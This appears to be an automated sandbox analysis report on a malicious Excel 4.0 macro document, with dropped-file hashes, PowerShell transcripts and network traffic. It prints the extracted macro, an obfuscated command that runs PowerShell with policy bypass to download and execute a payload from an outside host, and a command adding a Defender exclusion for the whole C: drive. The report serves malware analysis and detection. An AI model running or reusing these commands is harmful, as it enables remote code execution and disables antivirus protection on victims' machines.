File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3072
Entropy (8bit):	2.714358747964494
Encrypted:	false
SSDEEP:	24:etGS6c/Bepsl/d8d7itoe9oltkZfqDZaHUxbI+ycuZhNUakSgPNnq:66TyuMtosoQJo4HKb1ulUa34q
MD5:	456C8D5C780ED32B2430C9440E05B1C9
SHA1:	026E92BAEA1757A4D386DBA4110944897D70B16D
SHA-256:	DF3B042430D193D17DA3790B839C8FD6790AC80964CB45A9B60196E9DC6BFA36
SHA-512:	56A0B5F116B33A5E055309488820174A1C75115AC6B9E4127293A5C3E37B245159B4FF9F2A9C6CB0061444D32ABE6A22E4F6FC0ADCF6BAC5D2C192B1F26E3AF5
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...3.._...........!................~#... ...@....... ....................................@.................................$#..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B..................(....*BSJB............v4.0.30319......l.......#~..p.......#Strings....l.......#US.t.......#GUID.......H...#Blob...........G.........%3............................................................2.+...w.W.....W.......................................... 9.....P ......D.........J.....Q...D.....D...!.D.....D.............'.......9......................................."........<Module>.mvqape5o.dll.Win.nAtIvE.mscorlib.System.Object.ShowWindow..ctor.handle.state.System.Runtime.CompilerSe

C:\Users\user\AppData\Local\Temp\mvqape5o\mvqape5o.out Download File
Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:	ASCII text, with CRLF, CR line terminators
Category:	modified
Size (bytes):	412
Entropy (8bit):	4.871364761010112
Encrypted:	false
SSDEEP:	12:zKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:zKaM5DqBVKVrdFAMBJTH
MD5:	83B3C9D9190CE2C57B83EEE13A9719DF
SHA1:	ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E
SHA-256:	B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
SHA-512:	0DE42AC5924B8A8E977C1330E9D7151E9DCBB1892A038C1815321927DA3DB804EC13B129196B6BC84C7BFC9367C1571FCD128CCB0645EAC7418E39A91BC2FEDB
Malicious:	false
Preview:	Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Roaming\.CxCK.C.tmp Download File
Process:	C:\Users\user\AppData\Local\Temp\Test3.jpg
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	87300
Entropy (8bit):	6.102677495198111
Encrypted:	false
SSDEEP:	1536:CdLUGRcZdJiXrXafIyYOetKdapZsyTwL3cDGOLN0nTwY/A3iuR1:CdLUFcbXafIB0u1GOJmA3iuR1
MD5:	D5D29F3050E6C920ECA7B7276AB537CE
SHA1:	CE24853BBE0BCC044B2216385612CBA2A754E4D4
SHA-256:	C0963F0007CBC3AA6AA3B9A906173730BB6B7644BE9D3DA903D64B42D4387FDB
SHA-512:	3BB59E005958968218FF3763B831B8898C47A6543CD6B017D52DA9176DBE0D6D545F25FB901D11DA2B30D9BA86DCB59E0F295A9C1B14579C8B764849CFB76D8C
Malicious:	false
Preview:	{"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en-GB"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.601451012154773e+12,"network":1.601451004e+12,"ticks":765205613.0,"uncertainty":4222325.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABaHlwIoHYlQKZwuwW8V0yxAAAAAAIAAAAAABBmAAAAAQAAIAAAAOT4j8Zm9U1zXX6oEUpPqIYBIjSlOiLGeiMKiIFJZDroAAAAAA6AAAAAAgAAIAAAAFW1OavBhyV7qwszPZbindD+KU2Osh5O7HSmDPpFnuCDMAAAAGEkmqbufgFUSmOzx4cW7Aup7spqps4DvqbPrwRgUGqSpRZvQkbO+yVH56WF9zMTt0AAAAAyRwtYxjf7/AqYrFr0JZ6kbTiUt0/2PKkCw7ntLtbN2qrad7I3MeL4iNGDFgqRlhWgsb/6w0gJzQxAfL6rdzxi"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245922715401452"},"plugins":{"metadata":{"adobe-flash-player":{"d

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu Jun 27 17:12:41 2019, mtime=Fri Jan 8 07:34:25 2021, atime=Fri Jan 8 07:34:25 2021, length=12288, window=hide
Category:	dropped
Size (bytes):	904
Entropy (8bit):	4.650502527518261
Encrypted:	false
SSDEEP:	12:8z0XU7duCH2KOshY8D4ys7a9m+WrjAZ/DYbDvSeuSeL44t2Y+xIBjKZm:8zLishY8M0kAZbcD17aB6m
MD5:	7B65EE94E2707ECE5A82FFC400960F12
SHA1:	9B19E4578BB104328DED8B3BBAC9BD395023FD7E
SHA-256:	AC91660AA55E52EF9141E5B777462FF708E04E199B03DA3B3333E138C8B4EBA7
SHA-512:	3448EA79D28F87DEE3501ADCB05BCC608FD863A4697DD392829AC3FCA716BE0724E7E09E3ECDEE3C70B04AF459179424D5A6509B242FF73E0E353300BEBF48A9
Malicious:	false
Preview:	L..................F.............-...(D.....lx3......0......................u....P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L..(R@D....................:......;..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Q\|<..user.<.......N..(R@D....#J....................$._.j.o.n.e.s.....~.1.....(RMD..Desktop.h.......N..(RMD.....Y..............>.......x.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......E...............-.......D...........>.S......C:\Users\user\Desktop........\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...As...`.......X.......179605...........!a..%.H.VZAj...m<...............!a..%.H.VZAj...m<..........................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Telex06012020.LNK Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 06:35:53 2020, mtime=Fri Jan 8 07:34:25 2021, atime=Fri Jan 8 07:34:25 2021, length=129024, window=hide
Category:	dropped
Size (bytes):	2140
Entropy (8bit):	4.668952347199407
Encrypted:	false
SSDEEP:	24:86zYkl/LishY8AhAfuhyAHbutDh7aB6my6zYkl/LishY8AhAfuhyAHbutDh7aB6m:86sktitxhRHKKB6p6sktitxhRHKKB6
MD5:	5F2DBB344382930A5A49AE55658A9107
SHA1:	58C201CBE43F4C8066BE3A4D50F8AADBDF67C979
SHA-256:	D083995CBEF39E2EFD8662A99954A3FF207C2DC7075F19F90A852BA17CDDADEE
SHA-512:	2897CB6EF6ADD3200A7141A55E428D3D10B4E9088C7CA8BA1B85D521AD32CCF74AA69803FAF7EFC723B1A9E8130BEA8F07982EB0B071BFD1F06EB1AED3147BD6
Malicious:	false
Preview:	L..................F.... ...X..S.....OK......OK..................................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L..(R@D....................:......;..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Q\|<..user.<.......N..(R@D....#J....................$._.j.o.n.e.s.....~.1.....>Q}<..Desktop.h.......N..(R@D.....Y..............>......w&.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....p.2.....(RHD .TELEX0~1.XLS..T......>Q{<(RHD.....V......................C.T.e.l.e.x.0.6.0.1.2.0.2.0...x.l.s.......W...............-.......V...........>.S......C:\Users\user\Desktop\Telex06012020.xls..(.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.T.e.l.e.x.0.6.0.1.2.0.2.0...x.l.s.........:..,.LB.)...As...`.......X.......179605...........!a..%.H.VZAj...{................!a..%.H.VZAj...{...........................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2....

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	92
Entropy (8bit):	4.1711745601340615
Encrypted:	false
SSDEEP:	3:oyBVomMHZOVX/6lphZOVX/6lmMHZOVX/6lv:dj6M9S7W9SxM9S1
MD5:	0A818CE42B82E28C18F24F1461724805
SHA1:	A8825698DD788B8C2236FF6BEFB7235D0938A1ED
SHA-256:	D29555390CEE036E08F72AB94C450ADFAF4244F6318837DB856DA042C607EE07
SHA-512:	4824E4170BC4DC4022AB1ABDE52BC3ADC2F0DD3A95756CEAA115CFA04805489B2FCBED0DC14D8C339E73424450BCAB2A3ED5E4D11E97DB1CF4A1C55EF66BBDF0
Malicious:	false
Preview:	Desktop.LNK=0..[xls]..Telex06012020.LNK=0..Telex06012020.LNK=0..[xls]..Telex06012020.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	Little-endian UTF-16 Unicode text, with CR line terminators
Category:	dropped
Size (bytes):	22
Entropy (8bit):	2.9808259362290785
Encrypted:	false
SSDEEP:	3:QAlX0Gn:QKn
MD5:	7962B839183642D3CDC2F9CEBDBF85CE
SHA1:	2BE8F6F309962ED367866F6E70668508BC814C2D
SHA-256:	5EB8655BA3D3E7252CA81C2B9076A791CD912872D9F0447F23F4C4AC4A6514F6
SHA-512:	2C332AC29FD3FAB66DBD918D60F9BE78B589B090282ED3DBEA02C4426F6627E4AAFC4C13FBCA09EC4925EAC3ED4F8662FDF1D7FA5C9BE714F8A7B993BECB3342
Malicious:	false
Preview:	....p.r.a.t.e.s.h.....

C:\Users\user\AppData\Roaming\sztmmjA.tmp Download File
Process:	C:\Users\user\AppData\Local\Temp\Test3.jpg
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.792852251086831
Encrypted:	false
SSDEEP:	48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
MD5:	81DB1710BB13DA3343FC0DF9F00BE49F
SHA1:	9B1F17E936D28684FFDFA962340C8872512270BB
SHA-256:	9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
SHA-512:	CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\DCC40000 Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	Applesoft BASIC program data, first line number 16
Category:	dropped
Size (bytes):	137610
Entropy (8bit):	7.509226913581185
Encrypted:	false
SSDEEP:	3072:o4xEtjPOtioVjDGUU1qfDlaGGx+cL2QnAGHwSJtUkUlR/FoeHxv7nalHDCfZoCF0:BxEtjPOtioVjDGUU1qfDlavx+W2QnAyp
MD5:	CE5E8C9996E3AB34AC28489F2A3C8C55
SHA1:	147F9B4BFA526ACE9F31E5A8E509A4771AEEB7D8
SHA-256:	24D474665891192B3D310E2AD4AAF1484EE7FE764478C9FA5E2A475F07D26AF1
SHA-512:	6F913C3CEF7298186CAE737B9516848CBD7B27B176F2BDAC9B02F41B2B6D7BD4CE1FF74E05B44516484FF3D351D0DD6038262B40504D1EACA94DE14D63D08D29
Malicious:	false
Yara Hits:	Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: C:\Users\user\Desktop\DCC40000, Author: Florian Roth
Preview:	........T8..........................\.p....pratesh B.....a.........=...............................................=.....<.WN..8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...h...8...........C.a.m.b.r.i.a.1...,...8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......<...........C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.........."$"

C:\Users\user\Documents\20210108\PowerShell_transcript.179605.1KVzgujm.20210108093427.txt Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1285
Entropy (8bit):	5.303199615941223
Encrypted:	false
SSDEEP:	24:BxSAXm7vBZuzx2DOXC0fD/jLW7HjeTKKjX4CIym1ZJX/IJD/j1fvfuKs8MXiV+Ps:BZ8vjeoOVq7qDYB1Z0t3ZW2+rgZoZZdC
MD5:	10DB2489170F4AD7B069CF5E861DD6B6
SHA1:	84015D396BAB988BC4F2E41C7F6480E75FC90217
SHA-256:	D8AC486E4558FBAA4DE42E516D31FBE7F80F5C2716E3829E1196CA366434D1DE
SHA-512:	BD20F1BBE293CD2202290C2587B65EC22BAA481A0B5C88B9D23CB3CE3F962DC25142B67486D313EEFA95E9765569385A0093268AA5FFF60C5D2178B75945E012
Malicious:	false
Preview:	.********************..Windows PowerShell transcript start..Start time: 20210108093440..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 179605 (Microsoft Windows NT 10.0.17134.0)..Host Application: poWeRSheLL.EXe -ex BYPAsS -NoP -w 1 iEx( curL ('http://lankarecipes.com/mages.jp' + 'g' ))..Process ID: 5848..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..******************..Command start time: 20210108093440..********************..PS>iEx( curL ('http://lankarecipes.com/mages.jp' + 'g' ))..False..C:\Users\user\AppData\Local\Temp\Test1.txt..C:\Users\user\AppData\Local\Temp\Test2.gif.. 1 file(s) copied...Executing (Win32_Process)->Create()..Method execution successful...Out Parameters:..instance of __

C:\Users\user\Documents\20210108\PowerShell_transcript.179605.XuKY+ytb.20210108093520.txt Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	5048
Entropy (8bit):	5.386219134914956
Encrypted:	false
SSDEEP:	96:BZDjeN5sqDo1ZIZJjeN5sqDo1ZPM6UjZDjeN5sqDo1ZpFEEGZR:2y65
MD5:	B418FE0C9462B2B60E822C15FF7CA680
SHA1:	4B9F928A980EB8843454A1CD233D055034014EE5
SHA-256:	3667AC287C119EE21B3D6C58B1D2E7C864E92B95413C8721D33255AB185219B7
SHA-512:	2EFEC64E148C2FA558DD51B73A6D40CF514C0F48870493922CF6F8A97E43B33E0F48CC56D33A0B7D36BCD7239ED146567C97EDA848C3EB3F4B7075DC870A49A6
Malicious:	false
Preview:	.********************..Windows PowerShell transcript start..Start time: 20210108093537..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 179605 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell Add-MpPreference -ExclusionPath C:\..Process ID: 5368..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..******************..Command start time: 20210108093537..******************..PS>Add-MpPreference -ExclusionPath C:\..********************..Windows PowerShell transcript start..Start time: 20210108093841..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 179605 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell Add-MpPreference -Exclus

\Device\ConDrv Download File
Process:	C:\Windows\SysWOW64\wbem\WMIC.exe
File Type:	ASCII text, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	160
Entropy (8bit):	5.095703110114614
Encrypted:	false
SSDEEP:	3:YwM2FgCKGWMRX1eRHXWXKSovrj4WA3iygK5k3koZ3Pveys1MgkSH0wFJQAiveyzr:Yw7gJGWMXJXKSOdYiygKkXe/egkSH0qE
MD5:	DDDE552835D6965F874AE689CF0790A6
SHA1:	FD84334F01C4A23F1E8E8A1E273EDB20D0F227BA
SHA-256:	B21EF0761891F98BA637444A9390F8048920081EC4848B8EC88229E9B85BE387
SHA-512:	F6864733F63CBDC50B1435CACA0DAAED1F4AB9F1806147B3E4BB59BA421B056B022D7C08E2FF0B8543E1C016D82A595CCAA0255466ABD93EA0A9F1114CE2FDEF
Malicious:	false
Preview:	Executing (Win32_Process)->Create()...Method execution successful....Out Parameters:..instance of __PARAMETERS..{...ProcessId = 6852;...ReturnValue = 0;..};....

Static File Info

General
File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Author: OBA, Last Saved By: OBA, Name of Creating Application: Microsoft Excel, Create Time/Date: Wed Jan 6 16:14:54 2021, Last Saved Time/Date: Wed Jan 6 16:18:07 2021, Security: 0
Entropy (8bit):	7.63969342616772
TrID:	Microsoft Excel sheet (30009/1) 45.83% Microsoft Works Spreadsheet (27457/6) 41.94% Generic OLE2 / Multistream Compound File (8008/1) 12.23%
File name:	Telex06012020.xls
File size:	122880
MD5:	c221348cc4be1ca5c8d1fe510c672e57
SHA1:	b7bbcb23c92782d871a684afc34e4c8264e96b8e
SHA256:	07a877cc1499b20ae7bcaf0200f2576a100754fa661e391f36cbb95aa58a75b9
SHA512:	6cd55b442d3513b6377b595f5a05b7914133ff4c0630b57579f6927a8366e1117086d5cd00d07c3fd3ec9a9b0d9472900ac3638200d92a8222072dc40d793d84
SSDEEP:	3072:dfZ+RwPONXoRjDhIcp0fDlaGGx+cL26nAfHgSJtM2slx/FQeHxvjnqlHDCfVoCF:RZ+RwPONXoRjDhIcp0fDlavx+W26nAve
File Content Preview:	........................>.......................................................b..............................................................................................................................................................................

File Icon


Icon Hash:	74ecd4c6c3c6c4d8

Static OLE Info

General
Document Type:	OLE
Number of OLE Files:	1

OLE File "Telex06012020.xls"

Indicators
Has Summary Info:	True
Application Name:	Microsoft Excel
Encrypted Document:	False
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	True
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:	True

Summary
Code Page:	1252
Author:	OBA
Last Saved By:	OBA
Create Time:	2021-01-06 16:14:54
Last Saved Time:	2021-01-06 16:18:07
Creating Application:	Microsoft Excel
Security:	0

Document Summary
Document Code Page:	1252
Thumbnail Scaling Desired:	False
Contains Dirty Links:	False
Shared Document:	False
Changed Hyperlinks:	False
Application Version:	786432

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 114

General
Stream Path:	\x1CompObj
File Type:	data
Stream Size:	114
Entropy:	4.25248375193
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . . 9 . q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 288

General
Stream Path:	\x5DocumentSummaryInformation
File Type:	data
Stream Size:	288
Entropy:	3.22237115402
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . M a c r o 1 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 f0 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 ac 00 00 00 02 00 00 00 e4 04 00 00

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 200

General
Stream Path:	\x5SummaryInformation
File Type:	data
Stream Size:	200
Entropy:	3.44023669415
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O B A . . . . . . . . . O B A . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . S j . G . . . @ . . . . . s . G . . . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00

Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 118310

General
Stream Path:	Workbook
File Type:	Applesoft BASIC program data, first line number 16
Stream Size:	118310
Entropy:	7.74604422094
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . O B A B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . < . W N . . 8 . . . . . . . X . @ . . . . . . . . . . . " . . . . .
Data Raw:	09 08 10 00 00 06 05 00 a9 1f cd 07 c1 00 01 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 03 00 00 4f 42 41 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

Macro 4.0 Code

"=                            cItARKOyQs0SudK                         &            t1Bg8ysdvhEcSX0v9DVkRr1spwdW3kKqnK3                          &EXEC(""CmD.Exe  /C poWeRSheLL.EXe  -ex BYPAsS -NoP -w 1 iEx( curL  ('http://lankarecipes.com/mages.jp'  + 'g' ))"")"=  HALT()

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 8, 2021 09:34:53.061940908 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:53.245029926 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:53.245177984 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:53.247750044 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:53.430522919 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:53.435033083 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:53.435076952 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:53.435107946 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:53.435142994 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:53.435174942 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:53.435205936 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:53.435247898 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:53.435256958 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:53.435280085 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:53.435300112 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:53.435302019 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:53.435323000 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:53.435333014 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:53.435386896 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:53.618185997 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:53.618215084 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:53.618227959 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:53.618243933 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:53.618259907 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:53.618279934 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:53.618297100 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:53.618313074 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:53.618328094 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:53.618344069 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:53.618352890 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:53.618360043 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:53.618376970 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:53.618391991 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:53.618408918 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:53.618411064 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:53.618427992 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:53.618443966 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:53.618451118 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:53.618459940 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:53.618475914 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:53.618478060 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:53.618490934 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:53.618506908 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:53.618514061 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:53.618535995 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:53.618585110 CET	49728	80	192.168.2.4	192.185.236.165
Jan 8, 2021 09:34:53.801896095 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:53.801940918 CET	80	49728	192.185.236.165	192.168.2.4
Jan 8, 2021 09:34:53.801960945 CET	80	49728	192.185.236.165	192.168.2.4
